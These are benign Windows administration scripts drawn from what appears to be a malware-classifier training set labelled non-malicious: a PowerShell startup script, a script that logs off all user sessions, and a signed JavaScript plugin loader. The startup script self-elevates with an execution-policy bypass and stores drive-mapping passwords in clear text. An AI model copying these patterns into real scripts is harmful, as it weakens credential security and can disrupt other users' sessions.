: names that PowerShell will be happy with, just make sure each app you want to
: identify a process name for is already running first.
:
: A 2 second sleep delay is added to smooth out processing but can be removed if needed.
:
Notes : Sample script is safe to run as written, it will only load taskmanager and firefox.
: In general, I did not write this script for ease of readability. Most commands are
: one-liner style, sorry if that causes you grief.
:
Warnings : Drive mapping passwords are clear text within the script.
:
:
Last Update by : Kenneth C. Mazie (kcmjr)
Version History : v1.0 - 05-03-12 - Original
Change History : v2.0 - 11-15-12 - Minor edits
: v3.0 - 12-10-12 - Converted application commands to arrays
: v4.0 - 02-14-13 - Converted all other sections to arrays
:
=======================================================================================#>
clear-host
$Debug = $True
$CloudStor = $False
$ScriptName = "Startup Script"
#--[ Prep Pop-up Notifications ]--
[System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms")
$Icon = [System.Drawing.SystemIcons]::Information
$Notify = new-object system.windows.forms.notifyicon
$Notify.icon = $Icon #--[ NOTE: Available tooltip icons are = warning, info, error, and none
$Notify.visible = $true
#--[ Force to execute with admin priviledge ]--
$identity = [Security.Principal.WindowsIdentity]::GetCurrent()
$principal = new-object Security.Principal.WindowsPrincipal $identity
if ($principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) -eq $false) {$Args = '-noprofile -nologo -executionpolicy bypass -file "{0}"' -f $MyInvocation.MyCommand.Path;Start-Process -FilePath 'powershell.exe' -ArgumentList $Args -Verb RunAs;exit}
if ($debug){write-host "`n------[ Running with Admin Privileges ]------`n" -ForegroundColor DarkCyan}
$Notify.ShowBalloonTip(2500,$ScriptName,"Script is running with full admin priviledges",[system.windows.forms.tooltipicon]::Info)
if ($debug){write-host "Running in DEBUG Mode..." -ForegroundColor DarkCyan}
function Pause-Host { #--[ Only use if you need a countdown timer ]--
param($Delay = 10)
$counter = 0;
While(!$host.UI.RawUI.KeyAvailable -and ($Delay-- -ne $counter )) #--count down
#While(!$host.UI.RawUI.KeyAvailable -and ($counter++ -lt $Delay )) #--count up
{
clear-host
if ($debug){Write-Host "testing... $Delay"} #--count down
#Write-Host "testing... $counter" #--count up
[Threading.Thread]::Sleep(1000)
}
}
Function SetRoutes { #--[ Array consists of Network, Mask ]--
$RouteArray = @()
$RouteArray += , @("10.0.0.0","255.0.0.0")
$RouteArray += , @("172.1.0.0","255.255.0.0")
$RouteArray += , @("192.168.1.0","255.255.255.0")
#--[ Add more route entries here... ]--
$Index = 0
Do {
$RouteNet = $ShareArray[$Index][0]
$RouteMask = $ShareArray[$Index][1]
iex "route delete $RouteNet"
Sleep (2)
iex "route add $RouteNet mask $RouteMask $IP"
Sleep (2)
$Index++
}
While ($Index -lt $RouteArray.length)
}
Function SetMappings { #--[ Array consists of Drive Letter, Path, User, and Password ]--
$ShareArray = @()
$ShareArray += , @("J:","\\\\192.168.1.250\\Share1","username","password")
$ShareArray += , @("K:","\\\\192.168.1.250\\Share2","username","password")
#--[ Add more mapping entries here... ]--
$Index = 0
Do {
$MapDrive = $ShareArray[$Index][0]
$MapPath = $ShareArray[$Index][1]
$MapUser = $ShareArray[$Index][2]
$MapPassword = $ShareArray[$Index][3]
$net = $(New-Object -Com WScript.Network)
if ( Exists-Drive $MapDrive){$Notify.ShowBalloonTip(2500,$ScriptName,"Drive $MapDrive is already mapped...",[system.windows.forms.tooltipicon]::Info);if ($debug){write-host "Drive $MapDrive already mapped" -ForegroundColor DarkRed}}else{if (test-path $MapPath){$net.MapNetworkDrive($MapDrive, $MapPath, "False",$MapUser,$MapPassword);$Notify.ShowBalloonTip(2500,$ScriptName,"Mapping Drive $MapDrive...",[system.windows.forms.tooltipicon]::Info);if ($debug){write-host "Mapping Drive $MapDrive" -ForegroundColor DarkGreen}}else{$Notify.ShowBalloonTip(2500,$ScriptName,"Cannot Map Drive $MapDrive - Target Not Found...",[system.windows.forms.tooltipicon]::Info);if ($debug){write-host "Cannot Map Drive $MapDrive - Target Not Found" -ForegroundColor DarkRed}}}
Sleep (2)
$Index++
}While ($Index -lt $ShareArray.length)
}
Function Exists-Drive {
param($driveletter)
(New-Object System.IO.DriveInfo($driveletter)).DriveType -ne 'NoRootDirectory'
}
Function LoadApps { #--[ Array consists of Process Name, File Path, Arguements, Title ]--
$AppArray = @()
$AppArray += , @("firefox","C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe","https://www.google.com","FireFox")
#--[ Add more app entries here... ]--
#--[ Cloud Storage Provider Subsection ]--
if (!$CloudStor ){$Notify.ShowBalloonTip(2500,$ScriptName,"Cloud Providers Bypassed...",[system.windows.forms.tooltipicon]::Info);if ($debug){write-host "Cloud Providers Bypassed..." -ForegroundColor Magenta;}}
else
{
$AppArray += , @("googledrivesync","C:\\Program Files (x86)\\Google\\Drive\\googledrivesync.exe","/autostart","GoogleDrive")
#--[ Add more cloud entries here... ]--
}
$AppArray += , @("taskmgr","C:\\Windows\\System32\\taskmgr.exe"," ","Task Manager")
#--[ Add more app entries here... ]--
$Index = 0
Do {
$AppProcess = $AppArray[$Index][0]
$AppExe = $AppArray[$Index][1]
$AppArgs = $AppArray[$Index][2]
$AppName = $AppArray[$Index][3]
If((get-process -Name $AppProcess -ea SilentlyContinue) -eq $Null){start-process -FilePath $AppExe -ArgumentList $AppArgs ;$Notify.ShowBalloonTip(2500,$ScriptName,"$AppName is loading...",[system.windows.forms.tooltipicon]::Info);if ($debug){write-host "Loading" $AppName "..." -ForegroundColor DarkGreen}}else{$Notify.ShowBalloonTip(2500,$ScriptName,"$AppName is already running...",[system.windows.forms.tooltipicon]::Info);if ($debug){write-host "$AppName Already Running..." -ForegroundColor DarkRed } }
Sleep (2)
$Index++
}
While ($Index -lt $AppArray.length)
}
<#
function SendMail {
#param($strTo, $strFrom, $strSubject, $strBody, $smtpServer)
param($To, $From, $Subject, $Body, $smtpServer)
$msg = new-object Net.Mail.MailMessage
$smtp = new-object Net.Mail.SmtpClient($smtpServer)
$msg.From = $From
$msg.To.Add($To)
$msg.Subject = $Subject
$msg.IsBodyHtml = 1
$msg.Body = $Body
$smtp.Send($msg)
}
#>
Function IdentifyNics {
$Domain1 = "LabDomain.com"
$Domain2 = "OfficeDomain.com"
#--[ Detect Network Adapters ]--
$Wired = get-wmiobject -class "Win32_NetworkAdapterConfiguration" | where {$_.IPAddress -like "192.168.1.*" }
#--[ Alternate detection methods]--
#$Wired = get-wmiobject -class "Win32_NetworkAdapterConfiguration" | where {$_.IPAddress -like "192.168.1.*" } | where {$_.DNSDomainSuffixSearchOrder -match $Domain2}
#$Wired = get-wmiobject -class "Win32_NetworkAdapterConfiguration" | where {$_.Description -like "Marvell Yukon 88E8056 PCI-E Gigabit Ethernet Controller" }
$WiredIP = ([string]$Wired.IPAddress).split(" ")
$WiredDesc = $Wired.Description
if ($debug){
write-host "Name: " $Wired.Description`n"DNS Domain: " $Wired.DNSDomainSuffixSearchOrder`n"IPv4: " $WiredIP[0]`n"IPv6: " $WiredIP[1]`n""
if ($WiredIP[0]){$Notify.ShowBalloonTip(2500,$ScriptName,"Detected $WiredDesc",[system.windows.forms.tooltipicon]::Info)}else{$Notify.ShowBalloonTip(2500,$ScriptName,"Hardline not detected",[system.windows.forms.tooltipicon]::Info)}
}
sleep (2)
$WiFi = get-wmiobject -class "Win32_NetworkAdapterConfiguration" | where {$_.Description -like "Intel(R) Centrino(R) Advanced-N 6250 AGN" }
$WiFiIP = ([string]$WiFi.IPAddress).split(" ")
$WiFiDesc = $WiFi.Description
write-host "Name: " $WiFi.Description`n"DNS Domain: " $WiFi.DNSDomainSuffixSearchOrder`n"IPv4: " $WiFiIP[0]`n"IPv6: " $WiFiIP[1]
if ($WiFiIP[0]){$Notify.ShowBalloonTip(2500,$ScriptName,"Detected $WiFiDesc",[system.windows.forms.tooltipicon]::Info)}else{$Notify.ShowBalloonTip(2500,$ScriptName,"WiFi not detected",[system.windows.forms.tooltipicon]::Info)}
sleep (2)
#--[ Set Routes ]--
if ($WiredIP[0]) { #--[ The hardline is connected. Favor the hardline if both connected ]--
$IP = $WiredIP[0]
if ($Wired.DNSDomainSuffixSearchOrder -like $Domain1 -or $Wired.DNSDomainSuffixSearchOrder -like $Domain2) { #--[ the hardline is connected ]--
write-host ""`n"Setting routes for hardline"`n""
$Notify.ShowBalloonTip(2500,$ScriptName,"Setting routes for hardline...",[system.windows.forms.tooltipicon]::Info)
#SetRoutes $IP
}
} else {
if ($WiFiIP[0]) {
if ($WiFi.DNSDomainSuffixSearchOrder -like $Domain2) { #--[ The wifi is connected --]
$IP = $WiFiIP[0]
write-host ""`n"Setting routes for wifi"`n""
$Notify.ShowBalloonTip(2500,$ScriptName,"Setting routes for wifi...",[system.windows.forms.tooltipicon]::Info)
#SetRoutes $IP
}
}
}
}
#Write-Host $IP
#IdentifyNics
#SetMappings
#Pause-Host
LoadApps
If ($debug){write-host "Completed All Operations..." -ForegroundColor DarkCyan}
|
combined_dataset/train/non-malicious/Logoff all users_2.ps1
|
Logoff all users_2.ps1
|
function RemoveSpace([string]$text) {
$private:array = $text.Split(" ", `
[StringSplitOptions]::RemoveEmptyEntries)
[string]::Join(" ", $array) }
$quser = quser
foreach ($sessionString in $quser) {
$sessionString = RemoveSpace($sessionString)
$session = $sessionString.split()
if ($session[0].Equals(">nistuke")) {
continue }
if ($session[0].Equals("USERNAME")) {
continue }
# Use [1] because if the user is disconnected there will be no session ID.
$result = logoff $session[1] }
|
combined_dataset/train/non-malicious/sample_37_49.ps1
|
sample_37_49.ps1
|
let pluginUrl = window.chrome.webview.hostObjects.sync.external.GetPluginUrl();
let scripts = [pluginUrl, "Scripts/common.eventHandlers.js", "Scripts/aspire.eventHandlers.js"];
let currentScriptElement = document.querySelector("script[src='Scripts/aspire.plugin.js']");
if (currentScriptElement !== null) {
scripts.forEach(element => {
let newScriptElement = document.createElement("script");
newScriptElement.setAttribute("src", element);
newScriptElement.setAttribute("type", "text/javascript");
newScriptElement.async = false;
currentScriptElement.parentNode.insertBefore(newScriptElement, currentScriptElement.nextSibling);
currentScriptElement = newScriptElement;
});
}
// SIG // Begin signature block
// SIG // MIInywYJKoZIhvcNAQcCoIInvDCCJ7gCAQExDzANBglg
// SIG // hkgBZQMEAgEFADB3BgorBgEEAYI3AgEEoGkwZzAyBgor
// SIG // BgEEAYI3AgEeMCQCAQEEEBDgyQbOONQRoqMAEEvTUJAC
// SIG // AQACAQACAQACAQACAQAwMTANBglghkgBZQMEAgEFAAQg
// SIG // UxB0+L8e5mCO3kWXMDVZYdvMUiDr+vyn6eq4Ov+KTVKg
// SIG // gg2FMIIGAzCCA+ugAwIBAgITMwAAA64tNVHIU49VHQAA
// SIG // AAADrjANBgkqhkiG9w0BAQsFADB+MQswCQYDVQQGEwJV
// SIG // UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH
// SIG // UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBv
// SIG // cmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQgQ29kZSBT
// SIG // aWduaW5nIFBDQSAyMDExMB4XDTIzMTExNjE5MDg1OVoX
// SIG // DTI0MTExNDE5MDg1OVowdDELMAkGA1UEBhMCVVMxEzAR
// SIG // BgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1v
// SIG // bmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv
// SIG // bjEeMBwGA1UEAxMVTWljcm9zb2Z0IENvcnBvcmF0aW9u
// SIG // MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA
// SIG // 9CD8pjY3wxCoPmMhOkow7ycCltfqYnqk4wGNApzh2dTY
// SIG // +YqxozWTzJUOB38VxsgFQmXBFhOMdrGYGpvO9kdbNPkw
// SIG // HpTrW6hZqFuLLiRwGKEx4ZM5zVSqbHJuX2fPfUJ0Xmb+
// SIG // VrVsGw/BwBV2zz0rVtiSgqj3GeeGOsG7llfWyrSjyJqm
// SIG // 5DHE3o04BAI/NuhkHOv04euiqJGvHFCL8+fXvyD9OAxq
// SIG // 4fcJKtoyBb0PBA3oMNQeCsiUyLO+voZqVTOUsAWY0bN5
// SIG // YjkK4nq5DVaNdVrrowd5AX9gmz6D/TJTssns6pDCG00Y
// SIG // +Dh3ipWpnVmkhYcByyUSEKX3PLC8DkiAQQIDAQABo4IB
// SIG // gjCCAX4wHwYDVR0lBBgwFgYKKwYBBAGCN0wIAQYIKwYB
// SIG // BQUHAwMwHQYDVR0OBBYEFIcf73Spl4cHOFoll27H9COd
// SIG // 4fE/MFQGA1UdEQRNMEukSTBHMS0wKwYDVQQLEyRNaWNy
// SIG // b3NvZnQgSXJlbGFuZCBPcGVyYXRpb25zIExpbWl0ZWQx
// SIG // FjAUBgNVBAUTDTIzMDAxMis1MDE4MzYwHwYDVR0jBBgw
// SIG // FoAUSG5k5VAF04KqFzc3IrVtqMp1ApUwVAYDVR0fBE0w
// SIG // SzBJoEegRYZDaHR0cDovL3d3dy5taWNyb3NvZnQuY29t
// SIG // L3BraW9wcy9jcmwvTWljQ29kU2lnUENBMjAxMV8yMDEx
// SIG // LTA3LTA4LmNybDBhBggrBgEFBQcBAQRVMFMwUQYIKwYB
// SIG // BQUHMAKGRWh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9w
// SIG // a2lvcHMvY2VydHMvTWljQ29kU2lnUENBMjAxMV8yMDEx
// SIG // LTA3LTA4LmNydDAMBgNVHRMBAf8EAjAAMA0GCSqGSIb3
// SIG // DQEBCwUAA4ICAQBqyWA1Eu7PKNMjaaxl0V7gJ0XBysUo
// SIG // xZluMHJXFE2LEGZIZ2zMLYVjOnAGG/4dluRjSrZZo/8v
// SIG // wk4Xt8v6NBB9ofo8H1P/XidHytWTv9lg9MYu++6lPmu5
// SIG // fCozD3cI2NLZPW2BBhGX2D0R8tQBj0FbmZRuIucpiQ7D
// SIG // K3CHKlfKcc7MP8pPzuMv55Tox8+KFQD1NG6+bfbYA/BN
// SIG // PBkg4tyOh+exbaHfcNuodDJUIjq9dF6oa+Yjy0u0pUMI
// SIG // /B1t+8m6rJo0KSoZlrpesYl0jRhpt+hmqx8uENXoGJcY
// SIG // ZVJ5N2Skq90LViKNRhi9N4U+e8c4y9uXyomUF/6viCPJ
// SIG // 7huTNEJo75ehIJba+IWd3txUEc0R3y6DT6txC6cW1nR/
// SIG // LTbo9I/8fQq538G5IvJ+e5iSiOSVVkVk0i5m03Awy5E2
// SIG // ZSS4PVdQSCcFxmN4tpEfYuR7AAy/GJVtIDFlUpSgdXok
// SIG // pSui5hYtK1R9enXXvo+U/xGkLRc+qp4De3dZbzu7pOq7
// SIG // V/jCyhuCw0bEIAU4urCGIip7TI6GBRzD7yPzjFIqeZY7
// SIG // S4rVW5BRn2oEqpm8Su6yTIQvMIk8x2pwYNUa2339Z4gW
// SIG // 5xW21eFA5mLpo7NRSKRQms5OgAA18aCgqOU7Ds0h6q/Y
// SIG // B4BmEAtoTMl/TBiyKaMGAlEcdy+5FIhmzojMGjCCB3ow
// SIG // ggVioAMCAQICCmEOkNIAAAAAAAMwDQYJKoZIhvcNAQEL
// SIG // BQAwgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNo
// SIG // aW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQK
// SIG // ExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xMjAwBgNVBAMT
// SIG // KU1pY3Jvc29mdCBSb290IENlcnRpZmljYXRlIEF1dGhv
// SIG // cml0eSAyMDExMB4XDTExMDcwODIwNTkwOVoXDTI2MDcw
// SIG // ODIxMDkwOVowfjELMAkGA1UEBhMCVVMxEzARBgNVBAgT
// SIG // Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAc
// SIG // BgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEoMCYG
// SIG // A1UEAxMfTWljcm9zb2Z0IENvZGUgU2lnbmluZyBQQ0Eg
// SIG // MjAxMTCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoC
// SIG // ggIBAKvw+nIQHC6t2G6qghBNNLrytlghn0IbKmvpWlCq
// SIG // uAY4GgRJun/DDB7dN2vGEtgL8DjCmQawyDnVARQxQtOJ
// SIG // DXlkh36UYCRsr55JnOloXtLfm1OyCizDr9mpK656Ca/X
// SIG // llnKYBoF6WZ26DJSJhIv56sIUM+zRLdd2MQuA3WraPPL
// SIG // bfM6XKEW9Ea64DhkrG5kNXimoGMPLdNAk/jj3gcN1Vx5
// SIG // pUkp5w2+oBN3vpQ97/vjK1oQH01WKKJ6cuASOrdJXtjt
// SIG // 7UORg9l7snuGG9k+sYxd6IlPhBryoS9Z5JA7La4zWMW3
// SIG // Pv4y07MDPbGyr5I4ftKdgCz1TlaRITUlwzluZH9TupwP
// SIG // rRkjhMv0ugOGjfdf8NBSv4yUh7zAIXQlXxgotswnKDgl
// SIG // mDlKNs98sZKuHCOnqWbsYR9q4ShJnV+I4iVd0yFLPlLE
// SIG // tVc/JAPw0XpbL9Uj43BdD1FGd7P4AOG8rAKCX9vAFbO9
// SIG // G9RVS+c5oQ/pI0m8GLhEfEXkwcNyeuBy5yTfv0aZxe/C
// SIG // HFfbg43sTUkwp6uO3+xbn6/83bBm4sGXgXvt1u1L50kp
// SIG // pxMopqd9Z4DmimJ4X7IvhNdXnFy/dygo8e1twyiPLI9A
// SIG // N0/B4YVEicQJTMXUpUMvdJX3bvh4IFgsE11glZo+TzOE
// SIG // 2rCIF96eTvSWsLxGoGyY0uDWiIwLAgMBAAGjggHtMIIB
// SIG // 6TAQBgkrBgEEAYI3FQEEAwIBADAdBgNVHQ4EFgQUSG5k
// SIG // 5VAF04KqFzc3IrVtqMp1ApUwGQYJKwYBBAGCNxQCBAwe
// SIG // CgBTAHUAYgBDAEEwCwYDVR0PBAQDAgGGMA8GA1UdEwEB
// SIG // /wQFMAMBAf8wHwYDVR0jBBgwFoAUci06AjGQQ7kUBU7h
// SIG // 6qfHMdEjiTQwWgYDVR0fBFMwUTBPoE2gS4ZJaHR0cDov
// SIG // L2NybC5taWNyb3NvZnQuY29tL3BraS9jcmwvcHJvZHVj
// SIG // dHMvTWljUm9vQ2VyQXV0MjAxMV8yMDExXzAzXzIyLmNy
// SIG // bDBeBggrBgEFBQcBAQRSMFAwTgYIKwYBBQUHMAKGQmh0
// SIG // dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2kvY2VydHMv
// SIG // TWljUm9vQ2VyQXV0MjAxMV8yMDExXzAzXzIyLmNydDCB
// SIG // nwYDVR0gBIGXMIGUMIGRBgkrBgEEAYI3LgMwgYMwPwYI
// SIG // KwYBBQUHAgEWM2h0dHA6Ly93d3cubWljcm9zb2Z0LmNv
// SIG // bS9wa2lvcHMvZG9jcy9wcmltYXJ5Y3BzLmh0bTBABggr
// SIG // BgEFBQcCAjA0HjIgHQBMAGUAZwBhAGwAXwBwAG8AbABp
// SIG // AGMAeQBfAHMAdABhAHQAZQBtAGUAbgB0AC4gHTANBgkq
// SIG // hkiG9w0BAQsFAAOCAgEAZ/KGpZjgVHkaLtPYdGcimwuW
// SIG // EeFjkplCln3SeQyQwWVfLiw++MNy0W2D/r4/6ArKO79H
// SIG // qaPzadtjvyI1pZddZYSQfYtGUFXYDJJ80hpLHPM8QotS
// SIG // 0LD9a+M+By4pm+Y9G6XUtR13lDni6WTJRD14eiPzE32m
// SIG // kHSDjfTLJgJGKsKKELukqQUMm+1o+mgulaAqPyprWElj
// SIG // HwlpblqYluSD9MCP80Yr3vw70L01724lruWvJ+3Q3fMO
// SIG // r5kol5hNDj0L8giJ1h/DMhji8MUtzluetEk5CsYKwsat
// SIG // ruWy2dsViFFFWDgycScaf7H0J/jeLDogaZiyWYlobm+n
// SIG // t3TDQAUGpgEqKD6CPxNNZgvAs0314Y9/HG8VfUWnduVA
// SIG // KmWjw11SYobDHWM2l4bf2vP48hahmifhzaWX0O5dY0Hj
// SIG // Wwechz4GdwbRBrF1HxS+YWG18NzGGwS+30HHDiju3mUv
// SIG // 7Jf2oVyW2ADWoUa9WfOXpQlLSBCZgB/QACnFsZulP0V3
// SIG // HjXG0qKin3p6IvpIlR+r+0cjgPWe+L9rt0uX4ut1eBrs
// SIG // 6jeZeRhL/9azI2h15q/6/IvrC4DqaTuv/DDtBEyO3991
// SIG // bWORPdGdVk5Pv4BXIqF4ETIheu9BCrE/+6jMpF3BoYib
// SIG // V3FWTkhFwELJm3ZbCoBIa/15n8G9bW1qyVJzEw16UM0x
// SIG // ghmeMIIZmgIBATCBlTB+MQswCQYDVQQGEwJVUzETMBEG
// SIG // A1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u
// SIG // ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9u
// SIG // MSgwJgYDVQQDEx9NaWNyb3NvZnQgQ29kZSBTaWduaW5n
// SIG // IFBDQSAyMDExAhMzAAADri01UchTj1UdAAAAAAOuMA0G
// SIG // CWCGSAFlAwQCAQUAoIGuMBkGCSqGSIb3DQEJAzEMBgor
// SIG // BgEEAYI3AgEEMBwGCisGAQQBgjcCAQsxDjAMBgorBgEE
// SIG // AYI3AgEVMC8GCSqGSIb3DQEJBDEiBCCgSZ0QxzPX610j
// SIG // Qf8z2jZZzRsNUMdZZ5cMEw9FRhQ31TBCBgorBgEEAYI3
// SIG // AgEMMTQwMqAUgBIATQBpAGMAcgBvAHMAbwBmAHShGoAY
// SIG // aHR0cDovL3d3dy5taWNyb3NvZnQuY29tMA0GCSqGSIb3
// SIG // DQEBAQUABIIBAMQEskNuBJFYZjXiGw7ihRVMFlkIvAKm
// SIG // kriqlul37ASmcZArOp9b9vDFHYf3qOpOlGPQyTVC6pn5
// SIG // fRKOAppg4PrzCUDqtuPttQeSUJbtBNqsem3Z8XBZwp3A
// SIG // BeS/6o6RIHgFISkkgh2FW1nVWQupqpO8+HQBJ5q6Kc75
// SIG // VeNBGCOxDQTDuqPH6M+mu0sfqCAF4c0NMSudsINdl+lI
// SIG // HDgaeGXenfJooX94RyjOnGgDwQXwbiNt0X/5QykFMcAQ
// SIG // zYfsNw/m06K69Pd14ryqztMxgUuTpcFo3tXzmikfoZ8O
// SIG // gzDWDb+JJpBqUJuqZNhloP5Re6ZYp8ubR4OK53pbeBf4
// SIG // M/ahghcoMIIXJAYKKwYBBAGCNwMDATGCFxQwghcQBgkq
// SIG // hkiG9w0BBwKgghcBMIIW/QIBAzEPMA0GCWCGSAFlAwQC
// SIG // AQUAMIIBWAYLKoZIhvcNAQkQAQSgggFHBIIBQzCCAT8C
// SIG // AQEGCisGAQQBhFkKAwEwMTANBglghkgBZQMEAgEFAAQg
// SIG // vYKsKBLCMcDN/M4mCf9rgCQOSt1ZmU3+l/5y/mzBunoC
// SIG // BmXxz6losRgSMjAyNDA0MTAxNzE5MDAuMTNaMASAAgH0
// SIG // oIHYpIHVMIHSMQswCQYDVQQGEwJVUzETMBEGA1UECBMK
// SIG // V2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG
// SIG // A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYD
// SIG // VQQLEyRNaWNyb3NvZnQgSXJlbGFuZCBPcGVyYXRpb25z
// SIG // IExpbWl0ZWQxJjAkBgNVBAsTHVRoYWxlcyBUU1MgRVNO
// SIG // OjNCRDQtNEI4MC02OUMzMSUwIwYDVQQDExxNaWNyb3Nv
// SIG // ZnQgVGltZS1TdGFtcCBTZXJ2aWNloIIReDCCBycwggUP
// SIG // oAMCAQICEzMAAAHlj2rA8z20C6MAAQAAAeUwDQYJKoZI
// SIG // hvcNAQELBQAwfDELMAkGA1UEBhMCVVMxEzARBgNVBAgT
// SIG // Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAc
// SIG // BgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQG
// SIG // A1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIw
// SIG // MTAwHhcNMjMxMDEyMTkwNzM1WhcNMjUwMTEwMTkwNzM1
// SIG // WjCB0jELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hp
// SIG // bmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT
// SIG // FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMk
// SIG // TWljcm9zb2Z0IElyZWxhbmQgT3BlcmF0aW9ucyBMaW1p
// SIG // dGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjozQkQ0
// SIG // LTRCODAtNjlDMzElMCMGA1UEAxMcTWljcm9zb2Z0IFRp
// SIG // bWUtU3RhbXAgU2VydmljZTCCAiIwDQYJKoZIhvcNAQEB
// SIG // BQADggIPADCCAgoCggIBAKl74Drau2O6LLrJO3HyTvO9
// SIG // aXai//eNyP5MLWZrmUGNOJMPwMI08V9zBfRPNcucreIY
// SIG // SyJHjkMIUGmuh0rPV5/2+UCLGrN1P77n9fq/mdzXMN1F
// SIG // zqaPHdKElKneJQ8R6cP4dru2Gymmt1rrGcNe800CcD6d
// SIG // /Ndoommkd196VqOtjZFA1XWu+GsFBeWHiez/PllqcM/e
// SIG // WntkQMs0lK0zmCfH+Bu7i1h+FDRR8F7WzUr/7M3jhVdP
// SIG // pAfq2zYCA8ZVLNgEizY+vFmgx+zDuuU/GChDK7klDcCw
// SIG // +/gVoEuSOl5clQsydWQjJJX7Z2yV+1KC6G1JVqpP3dpK
// SIG // PAP/4udNqpR5HIeb8Ta1JfjRUzSv3qSje5y9RYT/AjWN
// SIG // YQ7gsezuDWM/8cZ11kco1JvUyOQ8x/JDkMFqSRwj1v+m
// SIG // c6LKKlj//dWCG/Hw9ppdlWJX6psDesQuQR7FV7eCqV/l
// SIG // fajoLpPNx/9zF1dv8yXBdzmWJPeCie2XaQnrAKDqlG3z
// SIG // Xux9tNQmz2L96TdxnIO2OGmYxBAAZAWoKbmtYI+Ciz4C
// SIG // YyO0Fm5Z3T40a5d7KJuftF6CToccc/Up/jpFfQitLfjd
// SIG // 71cS+cLCeoQ+q0n0IALvV+acbENouSOrjv/QtY4FIjHl
// SIG // I5zdJzJnGskVJ5ozhji0YRscv1WwJFAuyyCMQvLdmPdd
// SIG // AgMBAAGjggFJMIIBRTAdBgNVHQ4EFgQU3/+fh7tNczEi
// SIG // fEXlCQgFOXgMh6owHwYDVR0jBBgwFoAUn6cVXQBeYl2D
// SIG // 9OXSZacbUzUZ6XIwXwYDVR0fBFgwVjBUoFKgUIZOaHR0
// SIG // cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jcmwv
// SIG // TWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIw
// SIG // MTAoMSkuY3JsMGwGCCsGAQUFBwEBBGAwXjBcBggrBgEF
// SIG // BQcwAoZQaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3Br
// SIG // aW9wcy9jZXJ0cy9NaWNyb3NvZnQlMjBUaW1lLVN0YW1w
// SIG // JTIwUENBJTIwMjAxMCgxKS5jcnQwDAYDVR0TAQH/BAIw
// SIG // ADAWBgNVHSUBAf8EDDAKBggrBgEFBQcDCDAOBgNVHQ8B
// SIG // Af8EBAMCB4AwDQYJKoZIhvcNAQELBQADggIBADP6whOF
// SIG // jD1ad8GkEJ9oLBuvfjndMyGQ9R4HgBKSlPt3pa0XVLci
// SIG // mrJlDnKGgFBiWwI6XOgw82hdolDiMDBLLWRMTJHWVeUY
// SIG // 1gU4XB8OOIxBc9/Q83zb1c0RWEupgC48I+b+2x2VNgGJ
// SIG // UsQIyPR2PiXQhT5PyerMgag9OSodQjFwpNdGirna2rpV
// SIG // 23EUwFeO5+3oSX4JeCNZvgyUOzKpyMvqVaubo+Glf/ps
// SIG // fW5tIcMjZVt0elswfq0qJNQgoYipbaTvv7xmixUJGTbi
// SIG // xYifTwAivPcKNdeisZmtts7OHbAM795ZvKLSEqXiRUjD
// SIG // YZyeHyAysMEALbIhdXgHEh60KoZyzlBXz3VxEirE7nhu
// SIG // cNwM2tViOlwI7EkeU5hudctnXCG55JuMw/wb7c71RKim
// SIG // ZA/KXlWpmBvkJkB0BZES8OCGDd+zY/T9BnTp8si36Tql
// SIG // 84VfpYe9iHmy7PqqxqMF2Cn4q2a0mEMnpBruDGE/gR9c
// SIG // 8SVJ2ntkARy5SfluuJ/MB61yRvT1mUx3lyppO22ePjBj
// SIG // nwoEvVxbDjT1jhdMNdevOuDeJGzRLK9HNmTDC+TdZQlj
// SIG // +VMgIm8ZeEIRNF0oaviF+QZcUZLWzWbYq6yDok8EZKFi
// SIG // RR5otBoGLvaYFpxBZUE8mnLKuDlYobjrxh7lnwrxV/fM
// SIG // y0F9fSo2JxFmtLgtMIIHcTCCBVmgAwIBAgITMwAAABXF
// SIG // 52ueAptJmQAAAAAAFTANBgkqhkiG9w0BAQsFADCBiDEL
// SIG // MAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x
// SIG // EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv
// SIG // c29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9z
// SIG // b2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5IDIw
// SIG // MTAwHhcNMjEwOTMwMTgyMjI1WhcNMzAwOTMwMTgzMjI1
// SIG // WjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGlu
// SIG // Z3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMV
